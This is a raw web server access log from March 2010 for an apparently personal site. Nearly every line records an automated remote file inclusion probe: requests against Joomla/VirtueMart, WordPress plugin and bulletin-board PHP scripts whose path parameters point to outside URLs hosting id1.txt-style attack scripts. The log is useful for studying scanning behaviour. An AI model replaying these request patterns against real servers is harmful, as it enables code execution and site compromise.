61.63.82.14 - - [09/Mar/2010:09:29:59 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:29:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:08 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:08 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:16 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:29 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:29 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:58 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:30:59 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
201.93.165.28 - - [09/Mar/2010:09:33:01 -0800] "GET ///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
201.93.165.28 - - [09/Mar/2010:09:33:01 -0800] "GET /logs/access.log%20%20///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
201.93.165.28 - - [09/Mar/2010:09:33:01 -0800] "GET /logs///////delete_all.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:35:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:36:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:36:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:37:43 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:38:08 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:38:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:39:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.163.171.206 - - [09/Mar/2010:09:44:20 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:44:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:44:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:44:32 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:48:42 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:48:42 -0800] "GET ///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:48:47 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
76.13.114.106 - - [09/Mar/2010:09:49:40 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:49:47 -0800] "GET ///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:49:47 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:49:47 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
222.237.78.176 - - [09/Mar/2010:09:49:56 -0800] "GET /logs/access.log/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
222.237.78.176 - - [09/Mar/2010:09:49:56 -0800] "GET /logs/?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "colorlessgreen.net"
222.237.78.176 - - [09/Mar/2010:09:49:56 -0800] "GET /?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "colorlessgreen.net"
216.119.103.16 - - [09/Mar/2010:09:50:46 -0800] "GET /logs/access_100226.log%20%20///bbs/write_update.php?board_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:09:54:59 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:56:36 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:56:36 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:56:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:35 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:09:59:48 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:03 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:04 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:07 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:10:00:08 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
219.240.39.222 - - [09/Mar/2010:10:00:40 -0800] "GET ///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
219.240.39.222 - - [09/Mar/2010:10:00:40 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
219.240.39.222 - - [09/Mar/2010:10:00:40 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
219.240.39.222 - - [09/Mar/2010:10:01:13 -0800] "GET /logs/access_100226.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:23 -0800] "GET /logs/access.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:23 -0800] "GET ////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:23 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:30 -0800] "GET ////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:30 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:02:30 -0800] "GET /logs/access.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:03:44 -0800] "GET /logs/access_100226.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:10:03:51 -0800] "GET /logs/access_100226.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:26 -0800] "GET /logs/access_100226.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:26 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:54 -0800] "GET /logs/access_100226.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:54 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:07:54 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:12 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:12 -0800] "GET /logs/access_100226.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:12 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:15 -0800] "GET /logs/access_100226.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:15 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.227.136.138 - - [09/Mar/2010:10:08:15 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.208.135.7 - - [09/Mar/2010:10:17:12 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "colorlessgreen.net"
213.208.135.7 - - [09/Mar/2010:10:17:12 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "colorlessgreen.net"
110.45.144.106 - - [09/Mar/2010:10:17:40 -0800] "GET /logs/access_100226.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
110.45.144.106 - - [09/Mar/2010:10:17:40 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
110.45.144.106 - - [09/Mar/2010:10:17:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
222.109.127.201 - - [09/Mar/2010:10:34:21 -0800] "GET /logs/access_100226.log//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "colorlessgreen.net"
222.109.127.201 - - [09/Mar/2010:10:34:21 -0800] "GET /logs/access_100226.log//admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "colorlessgreen.net"
222.109.127.201 - - [09/Mar/2010:10:34:22 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "colorlessgreen.net"
222.109.127.201 - - [09/Mar/2010:10:34:22 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "colorlessgreen.net"
